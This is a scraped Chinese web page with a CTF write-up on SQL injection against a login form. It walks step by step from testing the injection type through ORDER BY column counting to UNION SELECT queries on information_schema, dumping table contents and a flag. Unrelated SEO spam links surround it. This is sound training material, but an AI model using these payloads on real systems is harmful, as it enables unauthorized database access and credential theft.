当前位置: 首页 > news >正文

php 学院网站淄博网络推广哪家好

php 学院网站,淄博网络推广哪家好,wordpress多域名多站点,一件代发应该在哪个网站上做题目环境:判断注入类型是否为数字型注入 admin 1 回显结果 否 是否为字符型注入 admin 1 回显结果 是 判断注入手法类型 使用堆叠注入 采用密码参数进行注入 爆数据库1; show database();#回显结果 这里猜测注入语句某字段被过滤,或者是’;被过滤导致不能…

题目环境:
image.png判断注入类型
是否为数字型注入

admin
1

回显结果
image.png

是否为字符型注入

admin
1'

回显结果
image.png

判断注入手法类型

使用堆叠注入
采用密码参数进行注入

爆数据库
1'; show database();#
回显结果
image.png

这里猜测注入语句某字段被过滤,或者是’;'被过滤导致不能堆叠注入

爆字段数
1';order by 4#
回显结果
image.png

报错
抛弃堆叠注入

步入正题
1' order by 4#
回显结果
image.png

成功,但是不存在第4列
同时验证了猜想不能使用堆叠注入

继续判断列数
1' order by 3#
image.png

可知列数只有3列

爆数据库
使用联合查询
1' union select 1,2,database()#
image.png
爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
回显结果
image.png

爆出两个表
开始爆数据表的字段
按照先后顺序把,先爆第一个

爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#
回显结果
image.png

字段:id、username、password

爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#
回显结果
image.png

无flag

转手数据表l0ve1ysq1
步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#
回显结果
image.png
image.png
得出flag:
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}

http://www.yayakq.cn/news/711979/

相关文章:

  • 礼品网站商城怎么做房地产网络推广方案
  • 网络营销网站建设公司wordpress变慢
  • 网站建设与管理专业教学计划筑梦做网站
  • 小伙反串做直播视频网站江西建设厅网站电子
  • 技术支持::天空网络-临汾做网站成都网站关键词推广优化
  • 百度做玻璃钢的网站网站首页模板制作
  • 做电影网站如何推广不一样维度的网站
  • 外贸网站怎么规划拟一份饰品网站建设合同
  • 导航网站教程泉州企业自助建站系统
  • 网站群建设招标友情链接如何选择网站
  • 网页制作与网站建设宝典(第2版)建设网站松岗
  • 网站的后期维护网站建设多久能学会
  • 网站建设用户分析织梦网站开发语言
  • 全国专业做美术网站的公司wordpress 占用内存高
  • 西安电商网站奥地利网站后缀
  • 网站模板怎么使用网页升级紧急通知每天正常更新
  • 东莞网站建设营销网站中国航发网上商城官网
  • 湖南昌正建设有限公司网站阿里邮箱企业登录入口
  • 网站建设策划模板下载微信公众号如何做微网站
  • 网站风格类型有哪些网站备案怎么换
  • 免费psd模板网站中文搜索引擎有哪些平台
  • 做签名的网站女子医院网站设计怎么做
  • 医疗室内设计网站推荐企业网站改版的好处
  • 网站过期怎么办wordpress调用置顶分类
  • 太原顶呱呱做网站地址电话做数据ppt模板下载网站
  • 网站建设宣传psd开展网站建设服务
  • 网站设计的一般流程什么是seo搜索
  • 跟网站开发有关的内容wordpress模特主题
  • 硬件开发流程图seoshanghai net
  • 自己做网站 搜索功能开发免费wordpress主题分享